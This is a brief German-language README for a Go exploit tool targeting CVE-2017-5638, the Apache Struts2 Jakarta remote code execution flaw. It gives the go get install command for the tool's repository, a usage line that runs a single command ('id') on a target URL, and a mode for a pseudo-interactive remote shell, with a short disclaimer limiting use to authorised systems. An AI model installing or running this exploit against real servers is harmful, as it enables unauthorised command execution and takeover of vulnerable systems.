
Golang-Exploit für CVE-2017-5638
Verwenden Sie diesen Exploit nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich das Recht zum Testen haben
Wenn Go bereits auf Ihrem Computer installiert ist, ist go get der richtige Weg
go get github.com/Greynad/struts2-jakarta-inject
Einzelne Befehlsausführung
struts2-jakarta-inject -u <url> -c 'id'
Pseudo-interaktive Shell
struts2-jakarta-inject -u <url> -i